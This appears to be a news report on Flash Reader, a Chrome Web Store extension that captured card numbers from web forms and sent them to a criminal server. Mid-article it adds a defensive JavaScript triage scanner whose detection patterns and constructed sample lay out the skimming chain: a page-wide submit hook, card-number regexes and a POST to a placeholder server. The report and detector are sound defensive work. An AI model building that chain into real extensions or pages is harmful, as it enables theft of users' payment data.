A malicious Google Chrome extension that can recognize and steal payment card details entered in web forms is still available on the Chrome Web Store.
The extension is the work of a cyber-criminal group and has been at the heart of a malware distribution effort in the past.
The website through which the extension was initially distributed is now down, but the extension is still available on the Play Store, meaning it could be used for future campaigns to infect new users.
Until now, the extension has been installed by roughly 400 users, according to stats available on its official Chrome Web Store listing.
The extension’s name is Flash Reader. According to a report from ElevenPaths, Telefonica’s cyber-security division, the extension was distributed via http://fbsgang[.]info/flashplayer/, a page to which crooks redirected web traffic, possibly from malvertising campaigns or exploit kits.
The page used the classic lure of “you don’t have Flash installed, use this Chrome extension instead,” and redirected users to Flash Reader’s official Chrome Web Store page to install it.
According to a review of the extension's code performed by this reporter and a third party, carried out to confirm ElevenPaths' findings, the extension contained code that intercepted any form submission made on any web page.
Regex rules would analyze the form's content for card number patterns specific to Visa, Mastercard, American Express, and Discover card formats.
Once the extension would find the data it wanted, it would send the harvested data to its command and control (C&C) server, located at http://fbsgang[.]info/cc/gate.php.
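The three behaviours described above (a page-wide form-submit hook, card-number regexes, and an outbound request to a hard-coded host) are what an analyst looks for when triaging an unpacked extension. The following is an added example written for this article, not code from the extension, from ElevenPaths or from ZDNet: a small static scanner over an extension's script text that flags each indicator and lists any host outside a short list of domains a Web Store extension would be expected to contact. The two sample scripts, the indicator regexes, the weights and the `c2.invalid` host are all constructed for the example; the scanner is a heuristic for prioritising review, not a substitute for reading the code.

```javascript
// Added example: static triage of a Chrome extension's JavaScript for the
// behaviours attributed to Flash Reader in the article. Heuristic only; it
// never executes the script it inspects. All regexes and samples are constructed.

const INDICATORS = [
  // Document-level "submit" hooks see every form on every page the script runs in.
  { id: "form-submit-hook", weight: 2,
    re: /addEventListener\s*\(\s*["']submit["']|\.onsubmit\s*=/ },
  // Regex literals with a fixed run of 12-19 digits are typical of card-number matchers
  // (a ZIP-code or phone-number check uses much shorter runs).
  { id: "card-number-regex", weight: 3,
    re: /(?:\\d|\[0-9\])\s*\{\s*1[2-9]\s*\}/ },
  // "mod 10" comparisons are how candidate card numbers are validated (Luhn check).
  { id: "mod10-checksum", weight: 1,
    re: /%\s*10\s*[!=]==?\s*0/ },
  // Requests to absolute http(s) URLs: the exfiltration leg of the chain.
  { id: "outbound-request", weight: 2,
    re: /(?:fetch|sendBeacon|\.open)\s*\([^)]*["'`]https?:\/\// },
];

// Hosts an extension is commonly expected to talk to; anything else is reported.
const EXPECTED_HOST_SUFFIXES = ["google.com", "googleapis.com", "gstatic.com"];
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Collect every http(s) host named in the source that is not on the expected list.
function externalHosts(source) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_RE)) {
    const host = m[1].toLowerCase();
    const expected = EXPECTED_HOST_SUFFIXES.some(
      (s) => host === s || host.endsWith("." + s)
    );
    if (!expected) hosts.add(host);
  }
  return [...hosts].sort();
}

// Score one script and return the indicators hit, the external hosts and a verdict.
function triageScript(source) {
  const matched = INDICATORS.filter((i) => i.re.test(source));
  const hits = matched.map((i) => i.id);
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  const hosts = externalHosts(source);
  // Form hook + card-number regex + an external host is the full chain the article
  // describes; flag that combination as high regardless of the raw score.
  const fullChain =
    hits.includes("form-submit-hook") &&
    hits.includes("card-number-regex") &&
    hosts.length > 0;
  const verdict = fullChain || score >= 6 ? "high" : score >= 3 ? "review" : "low";
  return { hits, hosts, score, verdict };
}

// Constructed sample: fragments carrying all four indicators. It is not a working
// extension (harvest, sum and payload are never defined); the host is a placeholder.
const SUSPICIOUS_SAMPLE = `
document.addEventListener("submit", function (e) { harvest(e.target); }, true);
var pan = /\\b4\\d{15}\\b|\\b5[1-5]\\d{14}\\b/;
if (sum % 10 === 0) { fetch("http://c2.invalid/gate.php", { method: "POST", body: payload }); }
`;

// Constructed sample: a benign form validator. It hooks its own form's submit
// event, which alone is not a verdict: the digit run is short and nothing leaves the page.
const BENIGN_SAMPLE = `
form.onsubmit = function () { return /^\\d{5}$/.test(zip.value); };
chrome.runtime.sendMessage({ ok: true });
`;

console.log(triageScript(SUSPICIOUS_SAMPLE));
console.log(triageScript(BENIGN_SAMPLE));
```

The point of the weighted verdict is that a single indicator is common in legitimate extensions (form validators hook submit events; analytics libraries call external hosts); it is the combination of all three legs in one script, with a target host that is neither the developer's documented backend nor a Google domain, that should send the extension to a human reviewer.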
This command and control server is now down, but C&C servers are often taken down between campaigns. This doesn’t mean that users who have currently installed this extension are safe. Their card data was most likely already collected months before.
There is also the danger that the group could return with a new campaign, or push an extension update with a new C&C server address.
One thing missing from the extension's source code was any function to collect card issuer names, card expiration dates, or CVV codes. Without these details, the collected card numbers would be worth less on the dark market.
ElevenPaths researchers said they notified Google of the extension, which was uploaded on the Chrome Web Store in February last year. ZDNet has also sent an email to the Web Store team earlier today about the extension still being active.
One of the security researchers to whom ZDNet reached out suggested that the extension might also have been a test run for an upcoming campaign, although it was a test run that managed to infect 400 Chrome users, which, if anything, proves how easy it is to get people to install crappy extensions without sparing a thought for security considerations.